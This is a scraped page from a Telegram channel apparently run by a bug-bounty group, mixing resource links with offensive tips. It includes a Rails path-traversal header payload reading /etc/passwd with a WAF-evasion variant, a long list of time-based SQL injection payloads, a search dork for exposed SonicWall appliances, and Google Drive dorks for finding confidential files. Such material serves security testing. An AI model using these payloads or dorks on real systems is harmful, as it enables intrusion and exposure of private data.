Brut Security
14.8K subscribers
940 photos
73 videos
287 files
984 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
Google Dorking for Pentesters.pdf
1.2 MB
❀19πŸ”₯7🀝1
API Bug Bounty.pdf
4.1 MB
API Bug Bounty
❀32πŸ”₯10🫑6πŸ‘2
Reactions Please 🫠
πŸ”₯43πŸ‘8🐳6❀5πŸ—Ώ2🀝1
CVE-2025-23006: Deserialization of Untrusted Data in SonicWall SMA1000, 9.8 rating πŸ”₯

A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/FLFJT
πŸ‘‰ Dork: http.headers.server:"SMA"

Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002
πŸ”₯5❀3πŸ‘3
β˜„οΈNew IDOR POC- https://t.iss.one/brutsecurity_poc/13
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯6
πŸ”–always examine the .js files in the source code, for this I can recommend this simple but effective tool github.com/w9w/JSA from here you can access the endpoints of critical data, the places where backup files are stored and many endpoints.
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯12πŸ‘8❀5
πŸ”–Submaker - Subdomain Wordlist Generator

⬇️https://github.com/llMNMll/Submaker
Please open Telegram to view this post
VIEW IN TELEGRAM
❀8πŸ‘3
⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{

πŸ›If the server is deemed to be vulnerable, but a WAF is present:

../../../../../../e*c/p*s*d{{

βœ”οΈCredit- nav1n0x
Please open Telegram to view this post
VIEW IN TELEGRAM
1❀43πŸ‘15πŸ”₯8🫑4πŸ—Ώ2
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
❀28πŸ‘13
This media is not supported in your browser
VIEW IN TELEGRAM
For Real Bruh 😭😭😭😭😭
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯15🐳2🀨2πŸ—Ώ2😁1
🌟One-Liner - Extract all URLs from the Source Code

curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'


πŸ””@0x0SojalSec
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯24❀3πŸ‘3πŸ‘¨β€πŸ’»3🫑3
⚠️Google Drive Dorks
site:https://drive.google.com inurl:folder
site:https://drive.google.com inurl:open
site:https://docs.google.com inurl:d
site:https://drive.google.com "confidential"
site:https://docs.google.com inurl:d filetype:docx
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘9πŸ”₯7❀2
πŸ‘5πŸ”₯5
β˜„οΈIDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

πŸ›https://github.com/errorfiathck/IDOR-Forge
Please open Telegram to view this post
VIEW IN TELEGRAM
1πŸ”₯17❀6πŸ‘4πŸ‘¨β€πŸ’»2
Business Logic POC - Able To Unsubscribe User From Company
https://t.iss.one/brutsecurity_poc/16
❀11πŸ”₯5πŸ‘3
Drop Reactions β˜•οΈβ˜•οΈβ˜•οΈβ˜•οΈβ˜•οΈβ˜•οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
🫑16πŸ”₯10❀1🀨1πŸ‘¨β€πŸ’»1
πŸ””(Bug-Bounty) How to Know You are Ready for Full-Time Bug Bounty

βœ”οΈhttps://chintangurjar.com/posts/full-time-bug-bounty/
Please open Telegram to view this post
VIEW IN TELEGRAM
❀10🐳4πŸ‘1
Authentication Bypass: βš”οΈ
πŸ‘16πŸ”₯5